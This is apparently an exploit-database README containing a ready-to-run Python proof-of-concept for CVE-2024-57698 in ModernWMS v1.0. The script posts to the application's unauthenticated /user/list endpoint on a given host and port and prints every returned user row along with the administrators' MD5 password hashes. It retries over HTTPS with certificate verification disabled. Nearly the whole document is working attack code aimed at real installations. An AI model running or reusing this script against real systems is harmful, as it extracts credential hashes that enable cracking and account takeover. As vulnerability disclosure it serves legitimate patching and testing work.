README.md
Rendering markdown...
# Exploit Title: ModernWMS v1.0 - Admin MD5 Password Hash Disclosure - CVE-2024-57698
# Date: 31/12/2024
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/fjykTec/ModernWMS
# Version: 1.0
# CVE-2024-57698
# https://github.com/rodolfomarianocy/
import requests, argparse
def get_hash(res):
data = res.json()
admin_row = data['data']['rows']
print("-----------FULL DATA-----------")
print(admin_row,'\n')
for get_hash in admin_row:
hash = get_hash['auth_string']
print("ADMIN HASH PASSWORD IN MD5:", hash)
print("------------------------------------------------------------")
def main(host,port):
url = "%s:%s/user/list?culture=en-us" % (host, port)
try:
res = requests.post("http://"+url, json={'total': '0', 'pageIndex': '1','pageSize': '20'})
get_hash(res)
except requests.exceptions.ConnectionError as e:
print(e)
print("Connection error in HTTP scheme")
print("-------------------------------")
try:
print("Trying with HTTPS scheme...")
print("-------------------------------")
res = requests.post("https://"+url, json={'total': '0', 'pageIndex': '1','pageSize': '20'}, verify=False)
get_hash(res)
except requests.exceptions.ConnectionError as e:
print(e)
print("Connection error in HTTPS scheme")
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, usage="python exploit.py --host <ip> --port <port>")
parser.add_argument('--host', dest='host', action='store', required=True, type=str)
parser.add_argument('--port', dest='port', action='store', default=20011, type=str)
args = parser.parse_args()
main(args.host,args.port)